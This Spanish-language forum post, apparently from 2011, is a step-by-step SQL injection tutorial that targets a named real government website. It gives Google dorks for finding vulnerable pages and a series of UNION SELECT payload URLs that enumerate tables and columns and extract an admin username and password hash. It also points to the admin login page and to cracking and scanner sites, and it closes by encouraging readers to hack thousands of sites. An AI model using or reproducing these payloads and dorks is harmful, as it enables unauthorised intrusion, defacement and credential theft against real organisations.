PDA

Ver la Versión Completa Con Imagenes : Deface a db hack


Ayudante De Santa
06-11-2015, 22:19:08
Los mejores licores
colcrt
05-03-2011, 13:01:34
Hola todo bueno soy nuevo en el foro, y quiero compartir con ustedes un taller hack que he practicado y me aha ayudado muxo para encontrar bugs en mi pagina web


Bueno primero que nada hay que saber buscar webs vulnerables, les dejo algunos ejemplos de posibles busquedas con google:
inurl:newsDetail.php?id=
inurl:gov+noticias.php?id=
Basicamente esas son dos lindas formas de buscar webs vunerables, es cuestion de ir probando dorks y pensar que tipo de web estoy buscando pra vulnerar.
En este tuto voy a usar un ejemplo con la web del Ministerio Nacional de Defensa de Camboya para que entiendan que cualquier kaker puede ownear una web X o un gov >.<
Para encontrar un gov en mi caso use el siguiente dork:
inurl:gov.kh+news.php?id=
(kh Camboya)
Me tope con el ministerio y chequie si la web era vulnerable:
http://www.mond.gov.kh/news.php?id='
Efectivamente era vulnerable dado que me tiro error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/mondweb/public_html/news.php on line 55
Despues de esto se buscan tablas colocando despues del “=” “-1+union+select+1--” y ahi seguimos aumentando los números como en el siguiente ejemplo:
http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--
Ahí nos arroja unos numeritos que indican que llegamos a una tabla vulnerable.
Ahora vamos a buscar el nombre de la tabla sustituyendo cualquiera de los numeros arrojados en la consulta por “table_name” en nuestra url.
http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9--
Despues al final del ultimo nùmero agregamos “+from+information_schema.tables--”
http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9+from+information_s chema.tables--
Como tiene “schema” nos tiro un nombre de tabla por default “CHARACTER_SETS”ahora en caso de que no tuviera “information_schema” ahi estaria complicado porque habria que brutear las tablas y eso lo dejamos para otro tutorial.
Lo que sigue es buscar algun tabla que nos sirva como la de admin o users, cualquier cosa que te permita logearte en el panel de admin o sacar info interesante.
Para seguir conociendo las tablas agregamos “+limit+1,1” y vamos incrementando el primer 1 a medida que nos va dando nombres de las tablas.
http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9+from+information_s chema.tables+limit+3,1--
Asi podemos seguir incrementando hasta dar con la tabla o podemos concatenar por grupo y mirar todas las tablas juntas:
http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9
+from+information_schema.tables--
Obtendriamos el siguiente resultado:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABIL ITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROU TINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CON STRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,tbl mondnews,tblusers
Hay que tener en cuenta que puede suceder que no se nos muestren todas las tablas en la ventana, cuando ustedes ven que en una web concatenaron y no sacaron ninguna tabla interesante puede ser porque no este en la ventana del nvegador y ahi no se desesperen y usen “limit” y busquen por ese metodo mas tediosos pero seguro xD.
En este caso encntre la tabla “tblusers”
Ahora tendriamso que buscar columnas importantes dentro de la tabla que nos den login. Pass,etc..
Lo que tenemos que hacer es cambiar dodne colocamos “table_name” por “column_name” y modificar la injection por:
+from+information_schema.columns+where+table_name=char(116,9 8,108,117,115,101,114,115)+limit+0,1--
Se preguntaran porque aparece l serie : 116,98,108,117,115,101,114,115 y eso es porque el nombre de la tabla “tblusers” en ASCII es 116,98,108,117,115,101,114,115 xD
Aca les ejo un convertidor online: http://getyourwebsitehere.com/jswb/text_to_ascii.html
Ahora podemos ir recorriendo las columnas con “limit+1,1--”
http://www.mond.gov.kh/news.php?id=1+union+all+select+1,2,column_name,4,5,6,7,8,9+f rom+information_schema.columns+where+table_name=char(116,98, 108,117,115,101,114,115)+limit+1,1--
Ahi me arrojo el nombre de la columna: UserName.
Pueden seguir incrementando “limit” o concatenar como hicimos con las tablas de la misma forma:
http://www.mond.gov.kh/news.php?id=1+union+all+select+1,2,group_concat(column_name) ,4,5,6,7,8,9+from+information_schema.columns+where+table_nam e=char(116,98,108,117,115,101,114,115)--
Ahora tenemos todas las columnas de la tabla “tblusers”
uid,UserName,UPwd,AccType,RegDate,LastLogin,CounterLogin
Una vez que tenemos todo necesitamos sacar los datos concatenando nuveamente de la siguiente forma:
http://www.mond.gov.kh/news.php?id=1+union+all+select+1,2,concat(Username,0x3a,Upwd ),4,5,6,7,8,9+from+mysql.tblusers--
Resultado:
admin:2a3aeea5c8a0ff9a428cba65ebceb7e8 :D
En este caso hay un solo admin y user pero si queremos sacar mas users podemos concatenar el grupo de la siguiente forma:
http://www.mond.gov.kh/news.php?id=1+union+all+select+1,2,group_concat(Username,0x3 a,Upwd),4,5,6,7,8,9+from+tblusers--
Tmbien sucedio que en este caso la contraseña de Admin esta en MD5 y hay que crakearla (era de esperarse que como Ministeri Nacional de Defensa por lo menos tubieran una contraseña protegidita XD)
Hay webs que les van a dr la password en texto plano y otras que van a joder como en este caso, yo les recomiendo que usen google para crackear los hashes o tmb pueden ir al sitio de Zer0_Z0rG
http://www.informaticaxd.com.ar/ind3x.php?tool=md5 y probar suerte jeje
Una ùltima cosa antes de terminar con el tuto es enseñarles abuscar un panel de Admin, pueden usar Crawlers como el de Acunetix, pueden usar Pipper si estan en GNU/Linux o cualquier script que tenga un bue ndiccionario.
En mi caso sucede que el panelde admin del MOND.gov.kh es:
http://www.mond.gov.kh/login.html
Yapa final:
Aca les dejo el scanner de inyecciones SQL desarrolado por el grupo F-Security subido Online y funcional: http://www.upperbasement.com/STMB/
Aprovechen mientras este online y funcione que les facilita e trabajo solo tiene que colocar la url hasta el id y la scanea en busca de tablas vulnerbles ytmb encuentra “information_schema” si esta.
Creo que con esto estamos y doy por finalizado el tutorial, vallan a kakear 12344 webs o sigan estudiando y entiendan poruqe carajo ocurre todo esto y cuales son las vias de solucion al problema
Saludos...